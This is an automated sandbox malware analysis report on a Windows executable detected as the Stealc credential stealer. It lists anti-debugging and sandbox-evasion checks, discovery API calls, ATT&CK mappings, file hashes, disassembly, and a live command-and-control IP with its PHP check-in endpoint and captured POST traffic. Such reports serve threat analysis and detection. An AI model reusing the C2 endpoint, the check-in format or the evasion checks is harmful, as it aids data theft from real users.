                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13644
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BE45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00BE45C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress 0_2_00BF9860
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF9750 mov eax, dword ptr fs:[00000030h] 0_2_00BF9750
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA 0_2_00BF78E0
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00BF9600
                Source: file.exeBinary or memory string: PoProgram Manager
                Source: file.exe, 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00BF7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00BF7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00BF7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00BF7A30

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.be0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1358788116.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.be0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1358788116.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.215.113.37/ | 100% | URL Reputation | malware |
                http://185.215.113.37 | 100% | URL Reputation | malware |
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.phpWindows | file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpc | file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpZ | file.exe, 00000000.00000002.1399229578.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/M | file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37s | file.exe, 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1529189
                            Start date and time:2024-10-08 18:25:06 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 8s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 83
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes were analyzed, report is missing behavior information
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe
                            No simulations
                            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                            185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                            No context
                            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                            WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                             | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.947297463352463
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'835'520 bytes
                            MD5:f7b1143886156d2a48fcda8f5dec586e
                            SHA1:d0f524caa5ff55008c62c71fe8bf47e5c9cb12b2
                            SHA256:2b2dba893754d1e80e4fd6520017a706679796376cddcb37a09552e170e4ce21
                            SHA512:91ad77a423e2a8b84233ff5e6f80c91001311c2ba7d3caf451b3afc6f344c6a13be2cdceb33f5b1bde33275b3c7c971f73c34bd597f46975033d7a9f409304e0
                            SSDEEP:49152:HluWcX7kogYkCKXeCftKfjGUmQ6OU3cv:Hlz07kog5xuZ0cv
                            TLSH:7B8533B26DA2E25ADC3EA731BBAB03971360A3440C9596723BE5C731D585C4CE7D2378
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xa92000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007F6720DC151Ah
                            pavgb mm3, qword ptr [ebx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [ebx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax], bl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                             | 0x1000 | 0x25b000 | 0x22800 | 969a8684ebee764e4dee15c071ccce60 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             | 0x25e000 | 0x299000 | 0x200 | f545b12eb522469d14812b8d1f37ecab | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            uwwmduoa | 0x4f7000 | 0x19a000 | 0x19a000 | da2b27a03f0faed774e164d1645c55e1 | False | 0.9947200123856708 | data | 7.952745504093785 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            roqxtsuu | 0x691000 | 0x1000 | 0x400 | 73b42f82ded5c47e05d8d31a99b57ebf | False | 0.7177734375 | data | 5.77972498280191 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant | 0x692000 | 0x3000 | 0x2200 | a6a4f2f56fa9472175bd4309fc40a734 | False | 0.0642233455882353 | DOS executable (COM) | 0.6741741055839803 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            DLL | Import
                            kernel32.dll | lstrcpy
                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                            2024-10-08T18:26:14.098409+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49715 | 185.215.113.37 | 80 | TCP
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Oct 8, 2024 18:26:13.031398058 CEST | 49715 | 80 | 192.168.2.7 | 185.215.113.37
                            Oct 8, 2024 18:26:13.036375999 CEST | 80 | 49715 | 185.215.113.37 | 192.168.2.7
                            Oct 8, 2024 18:26:13.036462069 CEST | 49715 | 80 | 192.168.2.7 | 185.215.113.37
                            Oct 8, 2024 18:26:13.037276983 CEST | 49715 | 80 | 192.168.2.7 | 185.215.113.37
                            Oct 8, 2024 18:26:13.045710087 CEST | 80 | 49715 | 185.215.113.37 | 192.168.2.7
                            Oct 8, 2024 18:26:13.851593971 CEST | 80 | 49715 | 185.215.113.37 | 192.168.2.7
                            Oct 8, 2024 18:26:13.851680040 CEST | 49715 | 80 | 192.168.2.7 | 185.215.113.37
                            Oct 8, 2024 18:26:13.854497910 CEST | 49715 | 80 | 192.168.2.7 | 185.215.113.37
                            Oct 8, 2024 18:26:13.859854937 CEST | 80 | 49715 | 185.215.113.37 | 192.168.2.7
                            Oct 8, 2024 18:26:14.097385883 CEST | 80 | 49715 | 185.215.113.37 | 192.168.2.7
                            Oct 8, 2024 18:26:14.098408937 CEST | 49715 | 80 | 192.168.2.7 | 185.215.113.37
                            Oct 8, 2024 18:26:17.635600090 CEST | 49715 | 80 | 192.168.2.7 | 185.215.113.37
                            • 185.215.113.37
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.7 | 49715 | 185.215.113.37 | 80 | 7056 | C:\Users\user\Desktop\file.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Oct 8, 2024 18:26:13.037276983 CEST | 89 | OUT | GET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 8, 2024 18:26:13.851593971 CEST | 203 | IN | HTTP/1.1 200 OK
                            Date: Tue, 08 Oct 2024 16:26:13 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 8, 2024 18:26:13.854497910 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBA
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 38 32 34 45 36 34 39 34 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a
                            Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="hwid"77824E6494FB4109353171------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="build"doma------CGDGCFBAEGDHJKEBGCBA--
                            Oct 8, 2024 18:26:14.097385883 CEST | 210 | IN | HTTP/1.1 200 OK
                            Date: Tue, 08 Oct 2024 16:26:13 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=



                            Target ID:0
                            Start time:12:26:09
                            Start date:08/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0xbe0000
                            File size:1'835'520 bytes
                            MD5 hash:F7B1143886156D2A48FCDA8F5DEC586E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1358788116.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:10.1%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
API calls 14718->14719 14720 be4a7d 14719->14720 14721 bfa920 3 API calls 14720->14721 14722 be4a84 14721->14722 14723 bfa8a0 lstrcpy 14722->14723 14724 be4a8d 14723->14724 14725 be4aa3 InternetConnectA 14724->14725 14725->14681 14726 be4ad3 HttpOpenRequestA 14725->14726 14728 be4ebe InternetCloseHandle 14726->14728 14729 be4b28 14726->14729 14728->14681 14730 bfa9b0 4 API calls 14729->14730 14731 be4b3c 14730->14731 14732 bfa8a0 lstrcpy 14731->14732 14733 be4b45 14732->14733 14734 bfa920 3 API calls 14733->14734 14735 be4b63 14734->14735 14736 bfa8a0 lstrcpy 14735->14736 14737 be4b6c 14736->14737 14738 bfa9b0 4 API calls 14737->14738 14739 be4b8b 14738->14739 14740 bfa8a0 lstrcpy 14739->14740 14741 be4b94 14740->14741 14742 bfa9b0 4 API calls 14741->14742 14743 be4bb5 14742->14743 14744 bfa8a0 lstrcpy 14743->14744 14745 be4bbe 14744->14745 14746 bfa9b0 4 API calls 14745->14746 14747 be4bde 14746->14747 14748 bfa8a0 lstrcpy 14747->14748 14749 be4be7 14748->14749 14750 bfa9b0 4 API calls 14749->14750 14751 be4c06 14750->14751 14752 bfa8a0 lstrcpy 14751->14752 14753 be4c0f 14752->14753 14754 bfa920 3 API calls 14753->14754 14755 be4c2d 14754->14755 14756 bfa8a0 lstrcpy 14755->14756 14757 be4c36 14756->14757 14758 bfa9b0 4 API calls 14757->14758 14759 be4c55 14758->14759 14760 bfa8a0 lstrcpy 14759->14760 14761 be4c5e 14760->14761 14762 bfa9b0 4 API calls 14761->14762 14763 be4c7d 14762->14763 14764 bfa8a0 lstrcpy 14763->14764 14765 be4c86 14764->14765 14766 bfa920 3 API calls 14765->14766 14767 be4ca4 14766->14767 14768 bfa8a0 lstrcpy 14767->14768 14769 be4cad 14768->14769 14770 bfa9b0 4 API calls 14769->14770 14771 be4ccc 14770->14771 14772 bfa8a0 lstrcpy 14771->14772 14773 be4cd5 14772->14773 14774 bfa9b0 4 API calls 14773->14774 14775 be4cf6 14774->14775 14776 bfa8a0 lstrcpy 14775->14776 14777 be4cff 14776->14777 14778 bfa9b0 4 API calls 14777->14778 14779 be4d1f 14778->14779 14780 bfa8a0 lstrcpy 14779->14780 14781 be4d28 14780->14781 14782 bfa9b0 4 API calls 
